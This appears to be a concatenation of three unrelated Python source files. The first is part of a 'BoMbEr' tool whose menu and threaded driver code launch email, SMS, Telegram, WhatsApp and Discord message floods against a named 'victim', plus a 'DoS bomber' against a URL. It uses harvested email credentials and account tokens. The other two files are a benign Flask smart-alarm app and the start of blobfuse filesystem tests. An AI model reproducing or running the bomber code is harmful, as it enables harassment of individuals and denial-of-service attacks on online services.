print("\033[34m{}" .format(now.strftime('%Y-%m-%d / %H:%M:%S')) + "\033[37m {}" .format('|') + "\033[32m {}" .format(f'SUCCESS') + "\033[37m {}" .format('|') + "\033[36m {}" .format(cn) + "\033[37m {}" .format('|') + "\033[35m {}" .format(name))
except:
cn+=1
print("\033[34m{}" .format(now.strftime('%Y-%m-%d / %H:%M:%S')) + "\033[37m {}" .format('|') + "\033[31m {}" .format(f'FAILED') + "\033[37m {}" .format('|') + "\033[36m {}" .format(cn) + "\033[37m {}" .format('|') + "\033[35m {}" .format(name))
def main():
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT + '''╔══╗ ╔═╗╔═╦╗ ╔═══╗
║╔╗║ ║ ╚╝ ║║ ║╔══╝
║╚╝╚╦══╣╔╗╔╗║╚═╣╚══╦═╗
║╔═╗║╔╗║║║║║║╔╗║╔══╣╔╝
║╚═╝║╚╝║║║║║║╚╝║╚══╣║
╚═══╩══╩╝╚╝╚╩══╩═══╩╝
''')
print("\033[0m" + Fore.CYAN + "================================================")
print(Fore.YELLOW + "Created by Eban'ko - https://github.com/ebankoff")
print(Fore.CYAN + "================================================")
print('''
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m0\033[0m\033[40m\033[35m]\033[31m Exit
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m1\033[0m\033[40m\033[35m] Email bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m2\033[0m\033[40m\033[35m] SMS bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m3\033[0m\033[40m\033[35m] Telegram bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m4\033[0m\033[40m\033[35m] DoS bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m5\033[0m\033[40m\033[35m] WhatsApp bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m6\033[0m\033[40m\033[35m] Discord bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m7\033[0m\033[40m\033[35m]\033[36m Clear program cache
''')
try:
ans = input('\033[0m\033[40m\033[35m → \033[36m')
if ans == '0':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
ex()
elif ans == '1':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔═══╦═╗╔═╦═══╦══╦╗
║╔══╣ ╚╝ ║╔═╗╠╣╠╣║
║╚══╣╔╗╔╗║║ ║║║║║║
║╔══╣║║║║║╚═╝║║║║║ ╔╗
║╚══╣║║║║║╔═╗╠╣╠╣╚═╝║
╚═══╩╝╚╝╚╩╝ ╚╩══╩═══╝
''')
emails = []
passwords = []
to = str(input(Fore.YELLOW + Style.BRIGHT +'Enter target email:\033[36m '))
amount = int(input(Fore.YELLOW + Style.BRIGHT +'How many send from every address:\033[36m '))
subj = str(input(Fore.YELLOW + Style.BRIGHT +'Enter subject:\033[36m '))
mes = str(input(Fore.YELLOW + Style.BRIGHT +'Enter message:\033[36m '))
server = input(Fore.YELLOW + Style.BRIGHT +'Select emails server - 1:Gmail 2:Yahoo 3:Outlook 4:Yandex:\033[36m ')
ans4 = ""
ans5 = ""
with open(r"emails.txt", "r", encoding="utf-8") as file:
for line in file:
pos = line.find(':')
ans4 += line[:pos]
emails.append(ans4)
ans4 = ""
with open(r"emails.txt", "r", encoding="utf-8") as file:
for line in file:
pos = line.find(':')
ans5 += line[pos + 1:]
passwords.append(ans5)
ans5 = ""
emails = [line.rstrip() for line in emails]
passwords = [line.rstrip() for line in passwords]
for i in range(len(emails)):
th = Thread(target=email, args=(emails[i], passwords[i], to, amount, subj, mes, server,))
th.start()
print(Fore.GREEN + "Attacking...")
th.join()
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '2':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔═══╦═╗╔═╦═══╗
║╔═╗║ ╚╝ ║╔═╗║
║╚══╣╔╗╔╗║╚══╗
╚══╗║║║║║╠══╗║
║╚═╝║║║║║║╚═╝║
╚═══╩╝╚╝╚╩═══╝
''')
prx = input(Fore.YELLOW + Style.BRIGHT + "Proxy? yes/no:\033[36m ").lower()
code = input(Fore.YELLOW + Style.BRIGHT + "Target country code: \033[36m+")
number = code + input(Fore.YELLOW + Style.BRIGHT + f"Target number: \033[36m{code}")
tm = int(input(Fore.YELLOW + Style.BRIGHT + "Time attack(in seconds):\033[36m "))
thr = int(input(Fore.YELLOW + Style.BRIGHT + "Number of threads:\033[36m "))
for i in range(thr):
th = Thread(target=sms, args=(prx, number, tm,))
th.start()
print(f"\033[35m[\033[36m{str(i + 1)}\033[35m]" + Fore.CYAN + " thread started")
print(Fore.GREEN + "\nAttacking...")
th.join()
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '3':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔════╗ ╔╗
║╔╗╔╗║ ║║
╚╝║║╠╩═╣║╔══╦══╦═╦══╦╗╔╗
║║║ ═╣║║ ═╣╔╗║╔╣╔╗║╚╝║
║║║ ═╣╚╣ ═╣╚╝║║║╔╗║║║║
╚╝╚══╩═╩══╩═╗╠╝╚╝╚╩╩╩╝
╔═╝║
╚══╝
''')
name = input(Fore.YELLOW + Style.BRIGHT + "Victim name:\033[36m ")
count = int(input(Fore.YELLOW + Style.BRIGHT + "Number of messages:\033[36m "))
msg = input(Fore.YELLOW + Style.BRIGHT + "Message:\033[36m ")
cn = 0
print("")
print(Fore.YELLOW + Style.BRIGHT + "YOU HAVE 35 SECONDS TO LOG IN!")
input(Fore.YELLOW + Style.BRIGHT + "Press Enter to start")
telega(name, count, msg, cn)
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '4':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT + '''
╔═══╗ ╔═══╗
╚╗╔╗║ ║╔═╗║
║║║╠══╣╚══╗
║║║║╔╗╠══╗║
╔╝╚╝║╚╝║╚═╝║
╚═══╩══╩═══╝
''')
prx = input(Fore.YELLOW + Style.BRIGHT + "Proxy? yes/no:\033[36m ").lower()
url = input(Fore.YELLOW + Style.BRIGHT + "URL:\033[36m ")
tm = int(input(Fore.YELLOW + Style.BRIGHT + "Attack time in seconds:\033[36m "))
threads = int(input(Fore.YELLOW + Style.BRIGHT + "Threads:\033[36m "))
for i in range(threads):
th = threading.Thread(target=dos, args=(url, tm, prx,))
th.start()
print(f"\033[35m[\033[36m{str(i + 1)}\033[35m]" + Fore.CYAN + " thread started")
th.join()
time.sleep(4)
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '5':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔╗╔╗╔╦╗ ╔╗ ╔═══╗
║║║║║║║ ╔╝╚╗ ║╔═╗║
║║║║║║╚═╦═╩╗╔╬══╣║ ║╠══╦══╗
║╚╝╚╝║╔╗║╔╗║║║══╣╚═╝║╔╗║╔╗║
╚╗╔╗╔╣║║║╔╗║╚╬══║╔═╗║╚╝║╚╝║
╚╝╚╝╚╝╚╩╝╚╩═╩══╩╝ ╚╣╔═╣╔═╝
║║ ║║
╚╝ ╚╝
''')
name = input(Fore.YELLOW + Style.BRIGHT + "Victim name:\033[36m ")
count = int(input(Fore.YELLOW + Style.BRIGHT + "Number of messages:\033[36m "))
msg = input(Fore.YELLOW + Style.BRIGHT + "Message:\033[36m ")
cn=0
print("")
print(Fore.YELLOW + Style.BRIGHT + "YOU HAVE 15 SECONDS TO LOG IN!")
input(Fore.YELLOW + Style.BRIGHT + "Press Enter to start")
whatsapp(name, count, msg, cn)
print("")
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '6':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔═══╗ ╔╗
╚╗╔╗║ ║║
║║║╠╦══╦══╦══╦═╦═╝║
║║║╠╣══╣╔═╣╔╗║╔╣╔╗║
╔╝╚╝║╠══║╚═╣╚╝║║║╚╝║
╚═══╩╩══╩══╩══╩╝╚══╝
''')
prx = input(Fore.YELLOW + Style.BRIGHT + "Proxy? yes/no:\033[36m ").lower()
idd = input(Fore.YELLOW + Style.BRIGHT + "Target ID:\033[36m ")
tkn = input(Fore.YELLOW + Style.BRIGHT + "Account token:\033[36m ")
cnt = int(input(Fore.YELLOW + Style.BRIGHT + "Number of messages:\033[36m "))
msg = input(Fore.YELLOW + Style.BRIGHT + "Message:\033[36m ")
print("")
input(Fore.YELLOW + Style.BRIGHT + "Press Enter to start")
discord(tkn, idd, msg, cnt, prx)
print("")
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '7':
shutil.rmtree('__pycache__')
print("SUCCESS!")
ex()
else:
print(Fore.RED + 'ERROR!')
ex()
except:
print(Fore.RED + 'ERROR!')
ex()
if __name__=='__main__':
if platform == 'win32':
ctypes.windll.kernel32.SetConsoleTitleW("BoMbEr")
pb()
main()
|
smart_alarm.py | """
This module is a program that simulates a Smart Alarm as a Web Sever.
"""
import os
from datetime import datetime, timedelta
import calendar
import sched
import time
import json
import threading
import logging.config
import pyttsx3
import requests
from flask import Flask, render_template, request, redirect, url_for,\
flash
alarms = []
notifications = []
scheduler = sched.scheduler(time.time, time.sleep)
app = Flask(__name__)
# Ensure the 'log' directory exists for the file-based logging handlers
# configured below.  The old bare `except: print("")` swallowed every
# exception type and printed a stray blank line; narrow it to OSError
# (already-exists / permission) and stay silent.
try:
    os.mkdir("log")
except OSError:
    pass
logging.config.fileConfig('logging.conf',
disable_existing_loggers=False)
# creating logger
errorLogger = logging.getLogger('smartAlarmLogs')
eventLogger = logging.getLogger('smartAlarmEventsLog')
logging.info("STARTED LOG")
def save_to_log(array: list) -> list:
    """
    Reduce each alarm entry to the fields worth persisting in the event
    log — date_time, event name and event period — dropping anything
    after the first three items (such as the live scheduler event).
    :param array: a list where certain data is collected from.
    :return: a list of dicts in the persisted JSON shape.
    """
    return [{"date_time": entry[0], "event_name": entry[1],
             "event_period": entry[2]}
            for entry in array]
def get_last_line(fname: str):
    """
    Return the last line of the file *fname*.
    :param fname: a string informing the file name.
    :return: the last line as a string, or None when the file cannot be
        opened or is empty.
    """
    errorLogger.debug("GET LAST LINE: %s", fname)
    # check if the file exists / is readable
    try:
        file = open(fname, 'r')
    except IOError:
        # fixed doubled word in the original log message ("to to")
        errorLogger.error("Failed to read log file %s", fname)
        return None
    with file:
        lines = file.read().splitlines()
    # empty file -> no last line
    return lines[-1] if lines else None
def restore_from_log():
    """
    Rebuild the in-memory alarm list (and scheduler entries) from the
    last line of the system event log written by the event logger.
    Expired one-shot alarms are skipped with a warning.
    :return: None.
    """
    errorLogger.debug("RESTORE FROM LOG")
    log_file_name = get_config("sys_log_file")
    last_line = get_last_line(log_file_name)
    # check if the log file is empty
    if last_line:
        # The event logger writes "... : @<json list>", so '@' splits the
        # log prefix from the serialized alarms payload.
        split_data = last_line.split("@")
        if len(split_data) <= 1:
            errorLogger.error("Event(s) has not found in the system "
                              "log: %s", last_line)
            return
        # The payload was written with Python repr quoting; swap single
        # quotes for double quotes so json.loads accepts it.
        events_line = split_data[1].replace("\'", "\"")
        # converts it to json format
        events = json.loads(events_line)
        # recovering data from the log file and assigning it to the
        # alarm.
        for element in events:
            date_time = element["date_time"]
            date_time_obj = datetime.strptime(date_time, "%d/%m/%Y "
                                                         "%H:%M")
            event_name = element["event_name"]
            event_period = element["event_period"]
            # check the event isn't expired: repeating alarms are always
            # restored, one-shot alarms only if still in the future
            if event_period != "Once" or date_time_obj >= \
                    datetime.now():
                errorLogger.info("Restoring Alarm Notification "
                                 "Schedule(s)")
                time_delay = time_difference(date_time_obj)
                event_sched = scheduler.enter(
                    time_delay, 1, set_notification,
                    argument=(date_time, event_name, event_period))
                alarms.append([date_time, event_name, event_period,
                               event_sched])
                errorLogger.info("Alarm of Event %s has been Restored"
                                 " successfully.", event_name)
            else:
                errorLogger.warning("Alarm of Event %s has expired due"
                                    " to only being repeated once.",
                                    event_name)
    else:
        errorLogger.warning("System log is empty")
def get_event(event_name: str) -> list:
    """
    Look up an alarm entry by its (user-chosen, unique) event name.
    :param event_name: a string that is unique, which has been set by
        the user.
    :return: the matching entry from the alarms list, or [] when no
        entry carries that name.
    """
    errorLogger.debug("GET EVENT: %s", event_name)
    return next((entry for entry in alarms if entry[1] == event_name), [])
def time_difference(date_time: datetime) -> int:
    """
    Seconds from now until *date_time*, truncated to a whole number
    (negative when the moment has already passed).
    :param date_time: a datetime used to calculate the time difference.
    :return: an integer number of remaining seconds.
    """
    errorLogger.debug("TIME DIFFERENT: %s", date_time)
    delta = date_time - datetime.now()
    seconds_left = int(delta.total_seconds())
    errorLogger.debug("Remaining Time from NOW: %d", seconds_left)
    return seconds_left
def add_one_month(date_time: datetime) -> datetime:
    """
    Return *date_time* shifted one month forward, clamping the day to
    the last day of the target month (e.g. 31 Jan -> 28/29 Feb).
    :param date_time: a datetime used to add one month to it.
    :return: the shifted datetime.
    """
    errorLogger.debug("ADD ONE MONTH: %s", date_time)
    year, month = date_time.year, date_time.month + 1
    # roll over into the next year when needed
    if month > 12:
        year, month = year + 1, month - 12
    day = min(date_time.day, calendar.monthrange(year, month)[1])
    return date_time.replace(year=year, month=month, day=day)
def add_days(event_period: str, date_time: str) -> datetime:
    """
    Compute the next occurrence of a repeating alarm.
    :param event_period: one of "Everyday", "Every Week", "Every Month"
        or "Every Year" (how often the repeat needs to be).
    :param date_time: the current occurrence as a "%d/%m/%Y %H:%M"
        string.
    :return: a datetime with added days for repeats, or None when
        *event_period* is not one of the known repeat values.
    """
    errorLogger.debug("ADD DAYS: %s, %s", event_period, date_time)
    date_time = datetime.strptime(date_time, "%d/%m/%Y %H:%M")
    if event_period == "Everyday":
        # add 1 day
        return date_time + timedelta(days=1)
    elif event_period == "Every Week":
        # add 1 week
        return date_time + timedelta(weeks=1)
    elif event_period == "Every Month":
        # add 1 month
        return add_one_month(date_time)
    elif event_period == "Every Year":
        # add 1 year; 29 Feb has no direct anniversary, so clamp to
        # 28 Feb (replace() would otherwise raise ValueError and crash
        # the scheduler thread).
        try:
            return date_time.replace(year=date_time.year + 1)
        except ValueError:
            return date_time.replace(year=date_time.year + 1, day=28)
def reschedule(date_time: str, event_name: str, event_period: str):
    """
    Remove a fired alarm from the list and, unless it was a one-shot
    ("Once") alarm, schedule its next occurrence.
    :param date_time: a datetime containing the date and time set by
    the user.
    :param event_name: a string representing the event name.
    :param event_period: a string representing the frequency of the
    alarm.
    """
    errorLogger.debug("RESCHEDULE: %s, %s, %s", date_time, event_name,
                      event_period)
    event = get_event(event_name)
    if event:
        # checking whether or not the event needs to be rescheduled;
        # both branches remove the fired entry, repeats then re-add it
        if event_period == "Once":
            alarms.remove(event)
        else:
            alarms.remove(event)
            new_date_time = add_days(event_period, date_time)
            temp_delay = time_difference(new_date_time)
            errorLogger.info("Add new schedule event")
            # rescheduling
            event_sched = scheduler.enter(
                temp_delay, 1, set_notification,
                argument=(str(new_date_time.strftime("%d/%m/%Y %H:%M")),
                          event_name, event_period))
            alarms.append([str(new_date_time.strftime("%d/%m/%Y %H:%M")),
                           event_name, event_period, event_sched])
def set_notification(date_time: str, event_name: str, event_period: str):
    """
    Fire an alarm: announce it via text-to-speech (best effort), record
    it in the notifications list, and reschedule repeating alarms.
    :param date_time: a datetime containing the date and time set by
        the user.
    :param event_name: a string representing the event name.
    :param event_period: a string representing the frequency of the
        alarm.
    """
    errorLogger.debug("SET NOTIFICATION: %s, %s, %s", date_time,
                      event_name, event_period)
    try:
        # text-to-speech; purely cosmetic, so a failure here must not
        # prevent the notification/reschedule below
        errorLogger.info("Alarm! Alarm! Alarm!")
        engine = pyttsx3.init()
        engine.say("Alarm! Alarm! Alarm!")
        engine.say("An alarm for " + event_name)
        engine.say("at " + date_time)
        engine.runAndWait()
        engine.stop()
    except Exception:
        # narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit
        # still propagate.  NOTE(review): the message assumes the only
        # failure mode is platform support — other pyttsx3 errors get
        # the same report.
        errorLogger.error("pyttsx3 only supports Windows environment")
    notifications.append([date_time, event_name, event_period])
    reschedule(date_time, event_name, event_period)
def scheduler_event():
    """
    Run the sched scheduler forever in a background thread, parallel to
    the Flask server.
    """
    errorLogger.debug("SCHEDULER EVENT")
    errorLogger.info("Start alarm scheduler events")
    while True:
        try:
            # non-blocking run prevents the thread from getting blocked
            # waiting for the next due event; we poll every 0.1s instead
            scheduler.run(blocking=False)
            time.sleep(0.1)
        except Exception:
            # narrowed from a bare 'except:' so SystemExit and
            # KeyboardInterrupt can still stop the thread
            errorLogger.error("Error in scheduler Thread")
def weather_api() -> json:
    """
    Fetch the current weather for Exeter from OpenWeatherMap.
    :return weather: a dict (city, temperature, description, icon) to
        be accessed in the html.
    """
    errorLogger.debug("WEATHER API")
    errorLogger.info("Getting Weather Data by URL")
    # weather api url; the API key is appended from config.json
    weather_url = "http://api.openweathermap.org/data/2.5/weather?q=" \
                  "{}&units=metric&appid="
    weather_url += get_config("weather")
    city = "Exeter"
    # a timeout keeps the web server responsive if the API hangs —
    # requests otherwise waits indefinitely
    weather_request = requests.get(weather_url.format(city),
                                   timeout=10).json()
    # storing the variable 'weather' as json
    weather = {
        "city": city,
        "temperature": weather_request["main"]["temp"],
        "description": weather_request["weather"][0]["description"],
        "icon": weather_request["weather"][0]["icon"],
    }
    return weather
def news_api() -> json:
    """
    Fetch the top BBC News headline from newsapi.org.
    :return news: a dict (url, image, title, description, date) to be
        accessed in the html.
    """
    errorLogger.debug("NEWS API")
    errorLogger.info("Getting News Data by URL")
    # news api url; the API key is appended from config.json
    news_url = "https://newsapi.org/v2/top-headlines?sources=" \
               "bbc-news&apiKey="
    news_url += get_config("news")
    # a timeout keeps the web server responsive if the API hangs —
    # requests otherwise waits indefinitely
    news_request = requests.get(news_url, timeout=10).json()
    # storing the variable 'news' as json
    news = {
        "url": news_request["articles"][0]["url"],
        "image": news_request["articles"][0]["urlToImage"],
        "title": news_request["articles"][0]["title"],
        "description": news_request["articles"][0]["description"],
        "date": news_request["articles"][0]["publishedAt"],
    }
    return news
def get_config(name: str):
    """
    Read a value from config.json.  "weather" and "news" are aliases
    for the corresponding *_api_key entries; any other *name* is used
    as a key directly.
    :param name: a string used to search for the value representing it.
    :return: the configured value, or None when the file can't be read.
    """
    errorLogger.debug("GET CONFIG: %s", name)
    # opening the config.json file
    try:
        config_file = open('config.json')
    except IOError:
        errorLogger.error("Failed to read config file %s", name)
        return None
    with config_file:
        data = json.load(config_file)
    aliases = {"weather": "weather_api_key", "news": "news_api_key"}
    return data[aliases.get(name, name)]
@app.route('/', methods=['GET'])
def root() -> redirect:
    """
    Entry point served at '/': immediately bounces the browser to the
    home page route.
    :return: redirect to the home method.
    """
    errorLogger.debug("ROOT")
    return redirect(url_for('home'))
@app.route('/home', methods=['GET'])
def home() -> render_template:
    """
    Render the main dashboard: current weather, top news headline, and
    the alarm/notification lists.  The global alarms list is sorted
    in place by date-time before rendering.
    :return: the rendered home-page template.
    """
    errorLogger.debug("HOME")
    weather = weather_api()
    news = news_api()
    # sorted in place, earliest alarm first (entry[0] is the
    # "%d/%m/%Y %H:%M" date-time string)
    alarms.sort(key=lambda x: datetime.strptime(x[0],
                                                '%d/%m/%Y %H:%M'))
    errorLogger.info("Alarms list has been sorted by date time")
    errorLogger.debug(alarms)
    return render_template(get_config("home_page"), weather=weather,
                           news=news, ALARMS=alarms,
                           NOTIFICATIONS=notifications)
@app.route('/addAlarm', methods=['POST'])
def add_alarm() -> redirect:
    """
    Create a new alarm from the posted form ('date', 'event_name',
    'event_period'), schedule its notification, and persist the alarm
    list to the system log.  Rejects past dates and duplicate names via
    flashed error messages.
    :return: redirect back to the home page.
    """
    errorLogger.debug("ADDING ALARM")
    # the datetime-local input sends "YYYY-MM-DDTHH:MM"
    date_time = request.form.get("date").replace('T', ' ')
    date_time = datetime.strptime(date_time, "%Y-%m-%d %H:%M")
    event_name = request.form.get("event_name")
    event_period = request.form.get("event_period")
    errorLogger.debug("ADDING ALARM: date_time: %s, event_name: %s, "
                      "event_period: %s", date_time, event_name,
                      event_period)
    # validating that the alarm is set to a future date.
    if date_time <= datetime.now():
        flash("Alarm of Event " + event_name + " at "
              + str(date_time.strftime("%d/%m/%Y %H:%M"))
              + " is in past!", 'error')
        errorLogger.warning("Alarm of Event %s at %s is in past.",
                            event_name,
                            str(date_time.strftime("%d/%m/%Y %H:%M")))
        return redirect(url_for('home'))
    # event names act as unique keys; an existing entry blocks creation
    alarm = get_event(event_name)
    if not alarm:
        errorLogger.info("Create Schedule for an event %s", event_name)
        time_delay = time_difference(date_time)
        event_sched = scheduler.enter(
            time_delay, 1, set_notification,
            argument=(str(date_time.strftime("%d/%m/%Y %H:%M")),
                      event_name, event_period))
        alarms.append([str(date_time.strftime("%d/%m/%Y %H:%M")),
                       event_name, event_period, event_sched])
        # Save alarms list into system log (critical level so it is
        # always written; restore_from_log() reads it back on startup)
        eventLogger.critical("Alarms list : @%s", save_to_log(alarms))
        errorLogger.info("Event change has been captured and recorded"
                         " into"
                         " system log for CREATE action.")
        flash("Alarm of Event " + event_name + " has been Created "
              "successfully",
              'success')
        errorLogger.info("Alarm of Event %s has been Created "
                         "successfully.", event_name)
    else:
        flash("Alarm of Event " + event_name + " already exists",
              'error')
        errorLogger.warning("Alarm of Event %s already exists.",
                            event_name)
    return redirect(url_for('home'))
@app.route('/editAlarm', methods=['POST'])
def edit_alarm() -> render_template:
    """
    Show the edit form for an existing alarm, pre-filled with the
    posted values.  The date is converted from the display format
    ("%d/%m/%Y %H:%M") to the datetime-local input format
    ("%Y-%m-%dT%H:%M") so the form widget can render it.
    :return: the rendered edit-page template.
    """
    errorLogger.debug("EDITING ALARM")
    weather = weather_api()
    news = news_api()
    temp_date = request.form.get("date")
    temp_date = datetime.strptime(temp_date, "%d/%m/%Y %H:%M")
    temp_date = str(temp_date.strftime("%Y-%m-%dT%H:%M"))
    temp_event_name = request.form.get("event_name")
    temp_event_period = request.form.get("event_period")
    errorLogger.debug("EDITING ALARM (Before): date_time:%s, "
                      "event_name:%s, event_period:%s", temp_date,
                      temp_event_name, temp_event_period)
    return render_template(get_config("edit_page"), weather=weather,
                           news=news, event_period=temp_event_period,
                           alarm=temp_date, event_name=temp_event_name)
@app.route('/updateAlarm/<string:event_id>', methods=['POST'])
def update_alarm(event_id: str) -> redirect:
    """
    Update an existing alarm with the values submitted from the edit form.

    Rejects dates in the past and renames that would collide with another
    alarm; otherwise cancels the old scheduler entry, schedules a new one,
    records the change in the system log, and redirects home.

    :param event_id: the current (old) name identifying the alarm to update.
    :return: a redirect to the home page.
    """
    errorLogger.debug("UPDATING ALARM")
    event_name = request.form.get("event_name")
    # The datetime-local input sends "YYYY-mm-ddTHH:MM"; normalise the "T".
    date_time = request.form.get("date").replace('T', ' ')
    date_time = datetime.strptime(date_time, "%Y-%m-%d %H:%M")
    event_period = request.form.get("event_period")
    errorLogger.debug("UPDATING ALARM (After): date_time:%s, "
                      "event_name:%s, event_period:%s", date_time,
                      event_name, event_period)
    # checks the date hasn't expired
    if date_time <= datetime.now():
        flash("Alarm of Event " + event_name + " at "
              + str(date_time.strftime("%d/%m/%Y %H:%M"))
              + " is in past!", 'error')
        errorLogger.warning("Alarm of Event %s at %s is in past.",
                            event_name,
                            str(date_time.strftime("%d/%m/%Y %H:%M")))
        return redirect(url_for('home'))
    old_event_name = event_id
    # checks if the event_name is unique
    if event_name != old_event_name:
        alarm = get_event(event_name)
        if alarm:
            flash("Alarm of Event " + event_name
                  + " already exists when event change from "
                  + old_event_name + "", 'error')
            # Fixed garbled log wording ("when change event change from").
            errorLogger.warning("Alarm of Event %s already exists "
                                "when event change from %s.",
                                event_name, old_event_name)
            return redirect(url_for('home'))
    errorLogger.info("Updating Schedule for an event %s", event_name)
    alarm = get_event(old_event_name)
    event_sched = alarm[3]
    # cancelling event
    errorLogger.debug("Cancelling Schedule")
    scheduler.cancel(event_sched)
    alarms.remove(alarm)
    # updating event
    errorLogger.debug("Updating Schedule")
    time_delay = time_difference(date_time)
    event_sched = scheduler.enter(
        time_delay, 1, set_notification,
        argument=(str(date_time.strftime("%d/%m/%Y %H:%M")),
                  event_name, event_period))
    # Same [date, name, period, sched-event] entry shape used when the
    # alarm is first created, kept consistent with the create path.
    alarms.append([str(date_time.strftime("%d/%m/%Y %H:%M")),
                   event_name, event_period, event_sched])
    # Save alarms list into system log
    eventLogger.critical("Alarms list : @%s", save_to_log(alarms))
    errorLogger.info("Event change has been captured and recorded into"
                     " system log for UPDATE action.")
    flash("Alarm of Event " + event_name + " has been updated "
          "successfully", 'success')
    errorLogger.info("Alarm of Event %s has been updated "
                     "successfully.", event_name)
    return redirect(url_for('home'))
@app.route('/deleteAlarm/<string:event_id>', methods=['POST'])
def delete_alarm(event_id: str) -> redirect:
    """
    Delete an existing alarm and cancel its pending scheduler entry.

    :param event_id: a string to indicate the id (name) of the event.
    :return: a redirect to the home page.
    """
    errorLogger.debug("DELETE ALARM")
    alarm = get_event(event_id)
    if alarm:
        event_sched = alarm[3]
        # deleting event
        errorLogger.debug("Cancelling Schedule")
        scheduler.cancel(event_sched)
        alarms.remove(alarm)
        # Save alarms list into system log
        eventLogger.critical("Alarms list : @%s", save_to_log(alarms))
        errorLogger.info("Event change has been captured and recorded "
                         "into system log for DELETE action.")
        flash("Alarm of Event " + event_id + " has been removed "
              "successfully", 'success')
        errorLogger.info("Alarm of Event %s has been removed "
                         "successfully.", event_id)
    else:
        # Fixed ungrammatical message ("is not exists for remove").
        flash("Alarm of Event " + event_id
              + " does not exist for removal", 'error')
        errorLogger.warning("Alarm of Event %s does not exist for "
                            "removal.", event_id)
    return redirect(url_for('home'))
if __name__ == '__main__':
    # Run the background scheduler loop on a daemon thread so it never
    # blocks interpreter shutdown. Thread.setDaemon() is deprecated;
    # pass daemon=True instead.
    scheduler_thread = threading.Thread(target=scheduler_event, daemon=True)
    scheduler_thread.start()
    # NOTE(review): hard-coded secret key — move to config/env for production.
    app.secret_key = 'super secret key'
    app.config['SESSION_TYPE'] = 'filesystem'
    # Rebuild the alarms list from the persisted system log before serving.
    restore_from_log()
    app.run()
|
tests.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from subprocess import call
import os
import shutil
import time
import unittest
import errno
import random
import uuid
import threading
import stat
import subprocess
import shlex
import datetime
# Module-level mode flags. Both default to off and are flipped to 1 at
# import time by BlobfuseTest's class body when the mounted blobfuse
# command line indicates a local ("myblob") or ADLS ("adls=") mount.
LOCAL_TEST = 0
ADLS_TEST = 0
print ("Local Testing Enabled : " + str(LOCAL_TEST))
'''
READ ME BEFORE RUNNING TESTS
1. Before running any test, mount blobfuse first
2. Change line 25 (variable blobdir) to the mounted container path you mounted
3. Change line 28 (variable localdir) to the local temp directory (You most likely don't need to change this)
4. Change line 31 (variable cachedir) to the designated cache directory used by blobfuse
Make sure your user has permissions to these folders you've designated and that the folders also
allow to be accessed by the tests (use chown and/or chmod)
HOW TO RUN TESTS:
$ python ./tests.py
(or replace 'tests.py' with the python test name)
use "-v" for details of each test as it runs (e.g. python ./tests.py -v)
To run individual tests or type of test add the class or class.methodtest in the command line
class: $ python ./tests.py OpenFileTests
method: $ python ./tests.py OpenFileTests.test_open_file_nonexistent_file_read
'''
class BlobfuseTest(unittest.TestCase):
    """Base fixture for all blobfuse tests.

    At class-definition (import) time this locates the running blobfuse
    process via ``ps`` and parses its command line to discover the mount
    point and the cache directory, so the tests operate against whatever
    container is currently mounted. Subclasses get per-test staging
    directories via setUp/tearDown plus shared validation helpers.
    """
    # Get the running instance of blobfuse
    cmd_to_find = "ps -eo args | grep blobfuse | grep tmp-path"
    blob_cmd = ""
    blob_cmd = str(subprocess.check_output(cmd_to_find, shell=True))
    #print (blob_cmd)
    # Flip the module-level mode flags based on what the mounted command
    # line contains.
    global LOCAL_TEST
    global ADLS_TEST
    x = blob_cmd.find("myblob")
    if x > 1 :
        LOCAL_TEST = 1
        print ("Local Testing Enabled (due to command filter): " + str(LOCAL_TEST))
    x = blob_cmd.find("adls=")
    if x > 1 :
        ADLS_TEST = 1
        print ("ADLS TEsting Enabled (due to command filter): " + str(ADLS_TEST))
    # Trim everything before the blobfuse binary path so splitting on
    # spaces yields [binary, mountpoint, options...].
    x = blob_cmd.find("/blobfuse")
    if x > 1 :
        blob_cmd = blob_cmd[x:]
    print (blob_cmd)
    blob_cmd_list = blob_cmd.split(" ")
    blob_cmd_tmppath = [opt for opt in blob_cmd_list if opt.startswith("--tmp-path")]
    # mounted container folder (first positional argument after the binary)
    blobdir = blob_cmd_list[1]
    print ("Mount Dir : " + blobdir)
    # local temp directory
    localdir = "/mnt/tmp"
    # designated folder for the cache, parsed from --tmp-path=... when present
    if (len(blob_cmd_tmppath) >= 1) :
        cachedir = blob_cmd_tmppath[0].split("=")[1]
        print ("Cache Dir : " + cachedir)
    else :
        cachedir = "/mnt/blobfusetmp"
    # folder within mounted container
    blobstage = ""
    def setUp(self):
        """Create the per-test staging dirs inside the mount and locally."""
        print (" >> ", self._testMethodName)
        self.blobstage = os.path.join(self.blobdir, "testing")
        if not os.path.exists(self.localdir):
            os.system("sudo mkdir " + self.localdir)
            #os.system("sudo chown -R `whoami` " + self.localdir)
